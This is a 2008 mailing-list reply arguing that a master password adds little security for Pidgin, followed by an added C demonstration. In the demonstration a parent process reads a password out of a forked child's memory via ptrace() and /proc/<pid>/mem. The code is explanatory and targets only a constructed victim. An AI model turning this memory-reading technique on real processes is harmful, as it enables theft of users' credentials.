How to save passwords more secure?!

Enrico Weigelt weigelt at metux.de
Tue Jul 1 18:18:49 EDT 2008


* skyout at wired-security.net <skyout at wired-security.net> wrote:

> This is nothing problematic until the following point: A user's computer
> gets compromised by a virus. The virus could simply read out all the ICQ
> UINs and can be quite sure the other ICQ user (the one the UIN belongs to)
> has granted access to OUR user to write messages. 

If your whole computer is compromised, you've got far worse problems 
than that. So you first have to make sure this cannot happen. The first 
step: kick off M$ crap! Second: use different (unprivileged !) accounts 
for different things and properly set up permissions.

You could, for example, run pidgin on a different uid. Well, the x11
protocol isn't very secure between apps which have access to the same
display, so you perhaps want to put a proxy in between which filters
out unwanted calls.

Another idea - which requires major redesign but is also good for lots
of other things - is to move out the core protocol handling to a 
separate server (the GUI then is just a client connecting to that server),
which can also run under a different uid. 9P2000 is a very fine protocol
for the IPC.

> I have five accounts in my Pidgin. Typing five passwords every time 
> I log into my messenger to start chatting would really suck, but one 
> password to decrypt all the others, that would still be good usability!

As others already noted: this won't help much - as soon as your account
(pidgin is running on) is compromised, the attacker can just use 
ptrace() to debug the pidgin process and read out the decrypted password.
So you gained *NO* additional security, but just made the whole code
much more complex.


cu
-- 
----------------------------------------------------------------------
 Enrico Weigelt, metux IT service -- http://www.metux.de/

 cellphone: +49 174 7066481   email: info at metux.de   skype: nekrad666
----------------------------------------------------------------------
 Embedded-Linux / Portierung / Opensource-QM / Verteilte Systeme
----------------------------------------------------------------------
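The ptrace() point made in the mail above, as an added example (this is not code from the original post or from Pidgin): a constructed victim process holds a "decrypted" password on its heap, and a second process running under the same uid attaches with PTRACE_ATTACH and reads it out with PTRACE_PEEKDATA, falling back to /proc/<pid>/mem if the ptrace syscall itself is unavailable. The password string, the function names and the use of a forked child as the victim are all assumptions made for the demonstration; it is Linux only, and the child/parent relationship is what lets it pass Yama's default ptrace_scope=1. A real attacker would not know the address and would scan the heap instead, which changes nothing about the conclusion.

```c
/* Added example (not from the original mail or from Pidgin): a same-uid
 * process reads a "decrypted" password out of another process's memory.
 * Linux only; the victim is a forked child so Yama ptrace_scope=1 permits it. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed stand-in for a password the IM client has just decrypted. */
static const char SECRET[] = "hunter2-icq-password";

/* Victim: keep the cleartext on the heap (as a client would after decrypting
 * its password store), tell the parent where it is, then idle. */
static void victim_child(int pipe_w) {
    char *buf = malloc(sizeof SECRET);
    if (!buf) _exit(1);
    memcpy(buf, SECRET, sizeof SECRET);
    uintptr_t addr = (uintptr_t)buf;
    if (write(pipe_w, &addr, sizeof addr) != (ssize_t)sizeof addr) _exit(1);
    close(pipe_w);
    for (;;) pause();
}

/* Attacker path 1: PTRACE_PEEKDATA, one word at a time, while the tracee is stopped. */
static int read_via_ptrace(pid_t pid, uintptr_t addr, char *out, size_t len) {
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) != 0) return -1;
    int status, rc = -1;
    if (waitpid(pid, &status, 0) == pid && WIFSTOPPED(status)) {
        rc = 0;
        for (size_t off = 0; off < len && rc == 0; off += sizeof(long)) {
            errno = 0;
            long word = ptrace(PTRACE_PEEKDATA, pid, (void *)(addr + off), NULL);
            if (word == -1 && errno != 0) rc = -1;
            size_t n = (len - off < sizeof(long)) ? len - off : sizeof(long);
            memcpy(out + off, &word, n);
        }
    }
    ptrace(PTRACE_DETACH, pid, NULL, NULL);
    return rc;
}

/* Attacker path 2: /proc/<pid>/mem, which the kernel guards with the same
 * ptrace access-mode check but which needs no ptrace() syscall at all. */
static int read_via_proc_mem(pid_t pid, uintptr_t addr, char *out, size_t len) {
    char path[64];
    snprintf(path, sizeof path, "/proc/%d/mem", (int)pid);
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = pread(fd, out, len, (off_t)addr);
    close(fd);
    return n == (ssize_t)len ? 0 : -1;
}

/* Spawn the victim and recover the secret; caller frees the result. NULL on failure. */
char *steal_secret(void) {
    int fds[2];
    if (pipe(fds) != 0) return NULL;
    pid_t pid = fork();
    if (pid < 0) return NULL;
    if (pid == 0) { close(fds[0]); victim_child(fds[1]); }
    close(fds[1]);

    char *out = NULL;
    uintptr_t addr = 0;
    if (read(fds[0], &addr, sizeof addr) == (ssize_t)sizeof addr) {
        out = calloc(1, sizeof SECRET);
        if (out && read_via_ptrace(pid, addr, out, sizeof SECRET) != 0 &&
            read_via_proc_mem(pid, addr, out, sizeof SECRET) != 0) {
            free(out);
            out = NULL;
        }
    }
    close(fds[0]);
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return out;
}

/* 1 if the bytes recovered from the victim equal its cleartext, else 0. */
int secret_recovered(void) {
    char *s = steal_secret();
    int ok = s != NULL && strcmp(s, SECRET) == 0;
    free(s);
    return ok;
}

int main(void) {
    char *s = steal_secret();
    printf("recovered: %s\n", s ? s : "(failed)");
    free(s);
    return s ? 0 : 1;
}
```

The two read paths are the practical reason the mail's conclusion holds: a master password only moves the cleartext from disk into the memory of a process the attacker already has ptrace rights over. Running the client under a separate uid, as the mail suggests, is what makes both paths fail, because the kernel's ptrace access check then refuses the attach and the open of /proc/<pid>/mem alike.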



